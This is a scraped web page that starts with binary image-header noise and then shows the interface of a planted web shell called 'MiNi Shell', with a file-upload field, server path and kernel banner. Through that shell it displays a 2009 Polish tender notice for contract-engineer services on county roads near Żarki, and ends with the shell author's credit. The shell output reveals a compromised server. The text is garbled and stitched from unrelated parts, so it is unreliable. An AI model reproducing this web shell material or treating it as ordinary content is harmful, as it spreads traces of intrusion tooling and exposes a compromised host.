JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090821/137753-N-2009.html

<p class="kh_header"><b>Żarki: Świadczenie usług Inżyniera Kontraktu w zakresie budownictwa drogowego dla zadania p.n.  Przebudowa dróg powiatowych:  Nr 1711S odcinek miejscowości Bliżyce - od skrzyżowania z DP 3807S - do granicy powiatu zawierciańskiego oraz odcinek drogi powiatowej Nr 3807S Bliżyce -Sokolniki</b><br>
<b>Numer ogłoszenia: 137753 - 2009; data zamieszczenia: 21.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Myszkowie , ul. Myszkowska 59, 42-310 Żarki, woj. śląskie, tel. 034 3148304, faks 034 3148304.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.myszkow.pzd.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług Inżyniera Kontraktu w zakresie budownictwa drogowego dla zadania p.n.  Przebudowa dróg powiatowych:  Nr 1711S odcinek miejscowości Bliżyce - od skrzyżowania z DP 3807S - do granicy powiatu zawierciańskiego oraz odcinek drogi powiatowej Nr 3807S Bliżyce -Sokolniki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług Inżyniera Kontraktu w zakresie budownictwa drogowego dla zadania p.n.  Przebudowa dróg powiatowych:  Nr 1711S odcinek miejscowości Bliżyce - od skrzyżowania z DP 3807S - do granicy powiatu zawierciańskiego oraz odcinek drogi powiatowej Nr 3807S Bliżyce -Sokolniki 
Projekt dotyczy realizacji robót drogowych .
Zamawiający powierzy Wykonawcy funkcję Inżyniera Kontraktu nad robotami związanymi z przebudową  dwóch odcinków dróg  powiatowych  na długości około  4400,00 mb w zakresie szczegółowo określonym w dokumentacji projektowej, obejmującymi w szczególności: 
1) roboty przygotowawcze: 
    - roboty pomiarowe   
    - roboty rozbiórkowe   
    - frezowanie istniejącej nawierzchni 
    - zabezpieczenie uzbrojenia podziemnego rurami osłonowymi 
    - wycinka drzew  
2) roboty ziemne :
    -  wykopy i nasypy pod projektowaną konstrukcję nawierzchni jezdni
    -  wykopy i nasypy dla projektowanych chodników i wjazdów
    -  wykopy i nasypy dla projektowanych rowów  
      3)  roboty nawierzchniowe:
    - wykonanie nawierzchni jezdni
    - wykonanie nawierzchni chodników
    - wykonanie nawierzchni zjazdów    
    4) budowa odwodnienia: 
    - odtworzenie istniejących przepustów
    - ułożenie prefabrykowanych ścieków   
5) roboty porządkowe i elementy bezpieczeństwa ruchu:
    - budowa poręczy i barier energochłonnych na przebudowanym przepuście 
    - oznakowanie pionowe i poziome
    - regulacja pionowa zasuw wodociągowych
    - montaż rur osłonowych
    - humusowanie z obsianiem trawą powierzchni projektowych zieleńcy i skarp
    - umocowanie dna i skarp projektowanych rowów.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.54.00.00-5, 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium ustala się  w wysokości:  2500 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 
 
1. zgodnie z art. 22 ust.1 Ustawy posiadają  uprawnienia do wykonywania określonej działalności lub czynności, jeżeli   ustawy nakładają obowiązek posiadania takich uprawnień oraz nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust.1i 2 Ustawy .

W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć następujące dokumenty  ( w przypadku wspólnego ubiegania się o udzielenie zamówienia w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich):
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
    działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub 
    zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześnie niż 6 
    miesięcy przed upływem terminu składania ofert; 
b) aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego 
    oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
    Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem 
    podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub 
    zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie 
    na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego 
     organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
c) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1
    pkt 4-8 ustawy  - Prawo Zamówień Publicznych, wystawiona nie wcześniej niż 6 miesięcy 
    przed upływem terminu składania ofert;  d) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 
    ust. 1 pkt 9 ustawy - Prawo zamówień Publicznych, wystawiona nie wcześniej niż 6 
    miesięcy przed upływem terminu składania ofert; 
e) podpisane oświadczenie , że nie podlega wykluczeniu z postępowania na podstawie  art. 24 ustawy Prawo zamówień publicznych .

2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem  technicznym i 
    osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne  zobowiązanie 
    innych podmiotów do udostępnienia potencjału technicznego i osób  zdolnych do
    wykonania zamówienia
    Aby warunek był spełniony :
Wykonawca musi wykazać ,że dysponuje osobami legitymującymi się doświadczeniem i kwalifikacjami odpowiednimi do stanowiska, jakie zostaną im powierzone, w szczególności określonymi przepisami ustawy Prawo budowlane .
Wykonawca przedstawi w ofercie kandydata na każde stanowisko wymienione poniżej :
	                                             
 Wymagana liczba osób 

1.   	  Kierownik Zespołu Inżyniera Kontraktu: 	             1 osoba
2.  	   Inspektor Nadzoru robót drogowych	             1 osoba
3.	   Specjalista ds. rozliczeń 	                             1 osoba

Wymiana wskazanych osób tylko i wyłącznie w uzasadnionych przypadkach po uprzedniej pisemnej zgodzie Zamawiającego.              

-  Kierownik Zespołu Inżyniera Kontraktu: ( koordynator)   -  zamawiający wymaga , aby osoba ta posiadała: 
wykształcenie wyższe techniczne, ekonomiczne lub prawne  ,doświadczenie zawodowe min. 5 lat, w tym przy zarządzaniu  i kierowaniu zespołem roboczym na co najmniej  jednym zakończonym zadaniu drogowym który był współfinansowany w ramach środków strukturalnych Unii Europejskiej  .
- Inspektor Nadzoru robót drogowych  -  uprawnienia budowlane do nadzorowania (kierowania) robotami budowlanymi bez ograniczeń w specjalności drogowej  . 
Osoba ta musi posiadać aktualny wpis na listę członków właściwej izby samorządu zawodowego.

- Specjalista ds. rozliczeń - Zamawiający wymaga, aby specjalista w dziedzinie rozliczeń posiadał: wykształcenie średnie , wyższe techniczne, ekonomiczne lub prawne,  minimum  5 letnie doświadczenie zawodowe, w tym przy rozliczaniu co najmniej jednego zakończonego projektu drogowego który był współfinansowany w ramach środków strukturalnych Unii Europejskiej  .

Wykonawca musi wykazać, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  wykonał co najmniej jedną usługę , której przedmiotem było kierowanie, nadzorowanie i rozliczenie projektów drogowych współfinansowanych  z funduszy strukturalnych Unii Europejskiej obejmujących budowę lub przebudowę dróg publicznych  o wartości robót co najmniej 5.000.000 zł brutto   z podaniem wartości, przedmiotu, daty wykonania , nazwy zamawiającego , oraz rodzaj środków i wysokość dofinansowania projektu  wraz z załączeniem dokumentów potwierdzających ,że usługa ta została wykonana z należytą starannością  (referencje)

3. Znajdują się w sytuacji ekonomicznej i finansowej  zapewniającej wykonanie zamówienia .

Aby udokumentować , że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Wykonawca musi wykazać ,że :
- posiada polisę ,  w przypadku jej braku inny dokument potwierdzający ,że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej , zgodnie z przedmiotem zamówienia . 

4. Wykonawcy , którzy ubiegają się wspólnie o udzielenie zamówienia , zobowiązani są: 
     a) do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie    
         zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie 
         zamówienia publicznego,
     b) spełniać warunki wymienione w Rozdziale V niniejszej SIWZ  

5. Ocena spełnienia warunków wymaganych od wykonawcy zostanie dokonana wg formuły 
                             spełnia  -  nie spełnia   .
6. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów, jakie maja dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu.

1. Wypełniony formularz oferty z wykorzystaniem wzoru  -  załącznik Nr 1 ; 2. Podpisane oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie  art. 24 ustawy Prawo zamówień publicznych i  spełnienia warunki określone w art.22  ustawy  Prawo zamówień publicznych  z wykorzystaniem wzoru  -  załącznik Nr 2 ;
3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześnie niż 6     miesięcy przed upływem terminu składania ofert; 
4. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy  - Prawo Zamówień Publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;  5. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 
ust. 1 pkt 9 ustawy - Prawo zamówień Publicznych, wystawiona nie wcześniej niż 6    miesięcy przed upływem terminu składania ofert; 
6. Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego 
oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia     Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem     podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub     zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie     na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego     organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
7. Informację o osobach, którymi dysponuje lub będzie dysponował Wykonawca i które będą skierowane do wykonania zamówienia  ( potencjał kadrowy) z wykorzystaniem  wzoru -  załącznik Nr 3  do oferty . Informacja musi zawierać dane na temat kwalifikacji zawodowych i doświadczenia wskazanych osób, potwierdzając jednocześnie spełnienie warunku określonego przez Zamawiającego . Do informacji winny być dołączone kopie uprawnień budowlanych osób , od osób, od których wymagane jest ich posiadanie ( przez uprawnienia budowlane rozumie się uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie , o których mowa w ustawie Prawo budowlane i dokument potwierdzający przynależność do Izby Inżynierów Budownictwa).
Zamawiający żąda pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia , jeżeli w wykazie, o którym mowa powyżej, Wykonawca wskazał osoby, którymi będzie dysponował.   
8. Wykaz wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie   wykonał co najmniej jedną usługę , której przedmiotem było kierowanie, nadzorowanie i rozliczenie projektów drogowych współfinansowanych  z funduszy strukturalnych Unii Europejskiej obejmujących budowę lub przebudowę dróg publicznych ( o kategorii nie mniejszej niż droga gminna) , o wartości robót co najmniej 5.000.000 zł brutto   z podaniem  wartości, przedmiotu, daty wykonania , nazwy zamawiającego , oraz rodzaj środków i wysokość dofinansowania projektu  wraz z załączeniem dokumentów potwierdzających ,że usługi te zostały wykonane z należytą starannością  (referencje) z wykorzystaniem wzoru - załącznik Nr 4;  
9. Aktualną  polisę lub inny dokument potwierdzający, że wykonawca jest ubezpieczony  od odpowiedzialności cywilnej w zakresie prowadzonej działalności;
10. Dowód wniesienia wadium bądź dokument świadczący o zabezpieczeniu wadium;
11. Zaakceptowany projekt umowy stanowiący załącznik do SIWZ. -  załącznik Nr 5;
12. Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej 
Polskiej składa dokumenty zgodnie z § 2 Rozporządzenia Prezesa Rady Ministrów z dnia      19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od
wykonawcy oraz form, w jakich te dokumenty mogą być składane ( Dz.U. Nr 87, poz.605)
13. Dokumenty wymagane w przypadku składania oferty wspólnej:
     - pełnomocnictwo wykonawców do reprezentowania ich w postępowaniu o udzielenie 
      zamówienia albo reprezentowania w postępowaniu i zawarcia umowy sprawie 
      zamówienia publicznego.  
19. W/w dokumenty  należy złożyć formie  oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę.   
20. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii 
dokumentu w przypadku, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna  lub budzi wątpliwości co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pzd.myszkow .pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w  Powiatowym Zarządzie Dróg w Myszkowie z/s w Żarkach  , 42 - 310 Żarki , ul. Myszkowska 59.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2009 godzina 09:00, miejsce: w  Powiatowym Zarządzie Dróg w Myszkowie    z/s w Żarkach ul. Myszkowska 59, 42-310 Żarki  (sekretariat)-pok. Nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> ZADANIE WSPÓŁFINANSOWANE ZE ŚRODKÓW UNII EUROPEJSKIEJ W RAMACH 
REGIONALNEGO PROGRAMU OPERACYJNEGO WOJEWÓDZTWA ŚLĄSKIEGO NA LATA 2007-2013  PRIORYTET VII  TRANSPORT 
DZIAŁANIE 7.1 MODERNIZACJA I ROZBUDOWA SIECI DROGOWEJ

Creat By MiNi SheLL
Email: jattceo@gmail.com